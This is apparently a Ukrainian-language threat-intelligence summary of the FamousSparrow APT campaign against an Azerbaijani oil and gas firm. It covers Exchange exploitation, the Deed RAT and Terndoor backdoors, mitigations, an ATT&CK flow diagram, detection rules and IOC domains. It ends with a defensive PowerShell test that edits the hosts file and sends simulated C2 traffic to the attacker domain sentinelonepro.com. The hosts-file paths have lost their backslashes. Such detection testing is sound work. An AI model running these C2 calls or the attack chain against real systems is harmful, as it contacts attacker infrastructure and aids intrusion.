Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Лабораторії Bitdefender виявили багатоетапне проникнення, націлене на азербайджанську нафтову і газову компанію в період з грудня 2025 по лютий 2026 року. Зловмисники експлуатували ланцюжки ProxyShell та ProxyNotShell для компрометації Microsoft Exchange, потім розгорнули бекдори Deed RAT та Terndoor за допомогою просунутих технік DLL-підвантаження, постійно повертаючись через ту ж саму початкову точку доступу. Bitdefender приписав цю активність угрупованню APT FamousSparrow, пов’язаному з Китаєм, з середньою до високої впевненістю. Кампанія також продемонструвала складні методи уникнення виявлення, включаючи перехоплення API та активацію завантажувача у кілька етапів.
Розслідування
Дослідники задокументували три різні хвилі активності. Перша включала розгортання веб-шелу на Exchange, за яким слідувала доставка Deed RAT за допомогою сервісу, схожого на LogMeIn Hamachi. Друга хвиля спробувала розгорнути Terndoor через ланцюг USOShared і драйвера, тоді як остання хвиля повернулася до Deed RAT з оновленими конфігураційними даними. Технічний аналіз виявив кастомизироване шифрування, процедури дешифрування RC4 і AES-CBC, стиснення LZNT1 і Deflate, а також структуру заголовка, схожу на PE. Згодом зловмисники переміщувалися по мережі через RDP, використовуючи обліковий запис адміністратора домену, і використовували інструменти SMB з фреймворка Impacket.
Пом’якшення
Організації повинні негайно виправити сервери Exchange та усунути всі відомі вразливості ProxyShell і ProxyNotShell. Сегментування мережі може допомогти зменшити вплив несанкціонованого використання облікових даних і горизонтального переміщення. Захисники також повинні застосовувати поведінкові засоби виявлення для DLL-підвантаження, перехоплення API та підозрілої реєстрації сервісів. Рекомендується строгий контроль за привілейованим доступом RDP і інструментами віддаленого виконання на основі SMB.
Відповідь
Команди безпеки повинні сигналізувати про створення веб-шелів у каталогах IIS, несподівані служби Windows з іменами LogMeIn Hamachi та реєстрації драйверів, запущених з каталогів, доступних для запису користувачем. Трафік HTTPS на незвичайні домени, такі як virusblocker.it.com and sentinelonepro.com повинен корелюватися з іншою підозрілою активністю. Слідчі також повинні вивчити будь-який процес, який патчить StartServiceCtrlDispatcherW або завантажує підозрілі DLL разом з легітимними бінарними файлами.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef technique fill:#e0e0e0 %% Node definitions initial_access["<b>Початковий доступ</b> – <b>T1210 Експлуатація віддалених сервісів</b><br/><b>Ідентифікатор техніки</b>: T1210<br/><b>Опис</b>: Експлуатація вразливого віддаленого сервісу, такого як сервер Exchange, за допомогою ProxyShell або ProxyNotShell."] class initial_access action persistence_webshell["<b>Стійкість</b> – <b>T1505.003 Веб-шелл</b><br/><b>Ідентифікатор техніки</b>: T1505.003<br/><b>Опис</b>: Розгорнути веб-шел на компрометованому сервері для постійного доступу."] class persistence_webshell action malicious_service["<b>Стійкість</b> – <b>T1569 Системні служби</b><br/><b>Ідентифікатор техніки</b>: T1569<br/><b>Опис</b>: Створити зловмисну службу, маскуючи під LogMeIn Hamachi для стійкості."] class malicious_service action tool_logmein["<b>Інструмент</b> – <b>Назва</b>: LogMeIn Hamachi<br/><b>Опис</b>: Законний VPN-сервіс, використаний для маскування."] class tool_logmein tool execution_proxy["<b>Виконання</b> – <b>T1218 Виконання підписаних бінарних проксі</b><br/><b>Ідентифікатор техніки</b>: T1218<br/><b>Опис</b>: Використовувати легітимний системний бінарний файл для запуску зловмисного коду."] class execution_proxy action execution_masquerade["<b>Виконання</b> – <b>T1036 Маскування</b><br/><b>Ідентифікатор техніки</b>: T1036<br/><b>Опис</b>: Перейменувати зловмисний виконуваний файл на LMIGuardianSvc.exe щоб злитися з середовищем."] class execution_masquerade action malware_lmi["<b>Зловмисне ПЗ</b> – <b>Назва</b>: LMIGuardianSvc.exe<br/><b>Опис</b>: Завантажує зловмисний DLL після виконання."] class malware_lmi malware defense_reflective["<b>Обхід захисту</b> – <b>T1620 Відображене завантаження коду</b><br/><b>Ідентифікатор техніки</b>: T1620<br/><b>Опис</b>: Завантажити код в пам’ять без запису на диск."] class defense_reflective action defense_processhollow["<b>Обхід захисту</b> – <b>T1055.012 Вилучення процесу</b><br/><b>Ідентифікатор техніки</b>: T1055.012<br/><b>Опис</b>: Замінити пам’ять легітимного процесу зловмисним кодом."] class defense_processhollow action defense_threadhijack["<b>Обхід захисту</b> – <b>T1055.003 Витіснення сегмента процесу</b><br/><b>Ідентифікатор техніки</b>: T1055.003<br/><b>Опис</b>: Захоплення потоків запущеного процесу."] class defense_threadhijack action defense_hide["<b>Обхід захисту</b> – <b>T1564.010 Приховування артефактів</b><br/><b>Ідентифікатор техніки</b>: T1564.010<br/><b>Опис</b>: Сховати зловмисні компоненти від виявлення."] class defense_hide action payload_decrypt["<b>Обробка полезного навантаження</b> – <b>T1560.003 Розпакування архіву</b><br/><b>Ідентифікатор техніки</b>: T1560.003<br/><b>Опис</b>: Розшифрувати й розпакувати полезне навантаження перед виконанням."] class payload_decrypt action lateral_movement["<b>Горизонтальне переміщення</b> – <b>T1078 Дійсні рахунки</b><br/><b>Ідентифікатор техніки</b>: T1078<br/><b>Опис</b>: Використання вкрадених облікових даних для горизонтального переміщення через RDP та адміністраторські шари SMB."] class lateral_movement action tool_impacket["<b>Інструмент</b> – <b>Назва</b>: Impacket<br/><b>Опис</b>: Python бібліотека для мережевих протоколів, що використовується для півотингу."] class tool_impacket tool c2_https["<b>Команда управління</b> – <b>T1071.001 Веб-протоколи HTTPS</b><br/><b>Ідентифікатор техніки</b>: T1071.001<br/><b>Опис</b>: Спілкування з сервером C2 через шифроване HTTPS."] class c2_https action c2_contentinject["<b>Команда управління</b> – <b>T1659 Впровадження контенту</b><br/><b>Ідентифікатор техніки</b>: T1659<br/><b>Опис</b>: Впровадження зловмисного контенту у легітимні HTTP-відповіді."] class c2_contentinject action impact_kernel["<b>Вплив</b> – <b>T1014 Руткіт</b><br/><b>Ідентифікатор техніки</b>: T1014<br/><b>Опис</b>: Спроба встановлення драйвера ядра Terndoor для глибокої стійкості."] class impact_kernel action %% З’єднання initial_access –>|веде до| persistence_webshell persistence_webshell –>|веде до| malicious_service malicious_service –>|використовує| tool_logmein malicious_service –>|веде до| execution_proxy execution_proxy –>|використовує| execution_masquerade execution_masquerade –>|завантажує| malware_lmi malware_lmi –>|виконує| defense_reflective defense_reflective –>|виконує| defense_processhollow defense_processhollow –>|виконує| defense_threadhijack defense_threadhijack –>|виконує| defense_hide defense_hide –>|дозволяє| payload_decrypt payload_decrypt –>|дозволяє| lateral_movement lateral_movement –>|використовує| tool_impacket lateral_movement –>|веде до| c2_https c2_https –>|використовує| c2_contentinject c2_contentinject –>|дозволяє| impact_kernel "
Атаковий потік
Виявлення
Можливе використання веб-сервера або веб-додатку [Windows] (через командний рядок)
Перегляд
Альтернативне віддалене підключення / програмне забезпечення управління (через процес ствоення)
Перегляд
Спроба комунікації запитів домену IP Lookup (через dns)
Перегляд
IOC (HashMd5) для виявлення: FamousSparrow APT Targets Azerbaijani Oil and Gas Industry
Перегляд
Виявлення команд і управління Deed RAT [Windows Network Connection]
Перегляд
DLL-підвантаження FamousSparrow APT в азербайджанській нафтовій і газовій промисловості [Подія файлу Windows]
Перегляд
## Виконання симуляції
Передумова: перевірка телеметрії та базова перевірка повинні були пройти успішно.
-
Оповідання про атаку та команди:
Зловмисник, що керує Deed RAT, хоче встановити стійкий C2 канал для виведення даних та отримання команд. Використовуючи PowerShell (T1059.001), RAT ініціює HTTPS GET-запит до жорстко закодованого зловмисного хоста
sentinelonepro.comна порту 443 (T1071.001). Оскільки з’єднання є вихідним, воно проходить через брандмауер Windows і фіксується Sysmon якNetworkConnectподія. Правило виявлення повинно спрацювати на цю подію. -
Сценарій регресійного тесту:
<# Симуляція C2 Deed RAT – створює вихідне HTTPS з'єднання до відомого зловмисного хоста (sentinelonepro.com) на порту 443. Цей сценарій є безпечним для тестування в ізольованій лабораторії; домен розв'язується до не маршрутизованої IP-адреси (127.0.0.1), щоб уникнути контакту з реальною інфраструктурою C2. #> # Перекрити розв'язання DNS для безпеки (опціонально) $hostsPath = "$env:SystemRootSystem32driversetchosts" if (-not (Select-String -Path $hostsPath -Pattern "sentinelonepro.com")) { Add-Content -Path $hostsPath -Value "`n127.0.0.1 sentinelonepro.com" } # Виконати HTTPS-запит (симульований C2-трафік) try { $response = Invoke-WebRequest -Uri "https://sentinelonepro.com/heartbeat" ` -UseBasicParsing ` -Headers @{ "User-Agent" = "DeedRAT/1.0" } ` -TimeoutSec 10 Write-Host "C2-запит завершено, статусний код:" $response.StatusCode } catch { Write-Warning "C2-запит не вдався (очікувано в ізольованій лабораторії): $_" } -
Команди очищення:
# Видалити тимчасовий запис хоста $hostsPath = "$env:SystemRootSystem32driversetchosts" (Get-Content $hostsPath) | Where-Object { $_ -notmatch "sentinelonepro.com" } | Set-Content $hostsPath # Видалити всі залишкові файли Remove-Item -Path "$env:TEMPexample.html" -ErrorAction SilentlyContinue